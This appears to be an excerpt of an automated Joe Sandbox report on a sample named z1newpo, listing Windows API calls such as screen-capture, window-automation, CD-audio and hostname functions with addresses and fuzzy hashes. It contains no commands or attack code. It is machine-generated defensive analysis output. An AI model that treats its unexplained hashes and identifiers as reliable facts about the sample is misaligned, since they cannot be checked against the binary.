                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                    • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu$Sleep
                                                    • String ID: 0
                                                    • API String ID: 1196289194-4108050209
                                                    • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                    • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                    • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                    • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                    • String ID: (
                                                    • API String ID: 3300687185-3887548279
                                                    • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                    • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                    APIs
                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1976180769-4113822522
                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                    • String ID:
                                                    • API String ID: 461458858-0
                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                    • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                    • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                    • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                    • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                    • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                    • DeleteObject.GDI32(?), ref: 004301D0
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3969911579-0
                                                    • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                    • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                    • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                    • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                    • String ID: 0
                                                    • API String ID: 956284711-4108050209
                                                    • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                    • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                    • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                    • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 1965227024-3771769585
                                                    • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                    • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                    • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                    • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove_wcslen
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 369157077-1007645807
                                                    • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                    • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                    • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                    • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                    APIs
                                                    • GetParent.USER32 ref: 00445BF8
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                    • __wcsicoll.LIBCMT ref: 00445C33
                                                    • __wcsicoll.LIBCMT ref: 00445C4F
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 3125838495-3381328864
                                                    • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                    • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                    • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                    • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                    APIs
                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                    • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                    • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                    • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CharNext
                                                    • String ID:
                                                    • API String ID: 1350042424-0
                                                    • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                    • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                    • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                    • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                    APIs
                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                    • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                    • _wcscpy.LIBCMT ref: 004787E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                    • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 3052893215-2127371420
                                                    • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                    • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                    • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                    • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                    APIs
                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                    • __swprintf.LIBCMT ref: 0045E7F7
                                                    • _wprintf.LIBCMT ref: 0045E8B3
                                                    • _wprintf.LIBCMT ref: 0045E8D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2295938435-2354261254
                                                    • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                    • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                    • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                    • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 3038501623-2263619337
                                                    • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                    • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                    • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                    • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                    APIs
                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                    • __swprintf.LIBCMT ref: 0045E5F6
                                                    • _wprintf.LIBCMT ref: 0045E6A3
                                                    • _wprintf.LIBCMT ref: 0045E6C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2295938435-8599901
                                                    • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                    • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                    • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                    • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00443B67
                                                      • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                    • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                    • SetActiveWindow.USER32(?), ref: 00443BEC
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                    • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                    • IsWindow.USER32(?), ref: 00443C3A
                                                    • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                    • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1834419854-3405671355
                                                    • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                    • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                    • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                    • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                    • LoadStringW.USER32(00000000), ref: 00454040
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • _wprintf.LIBCMT ref: 00454074
                                                    • __swprintf.LIBCMT ref: 004540A3
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
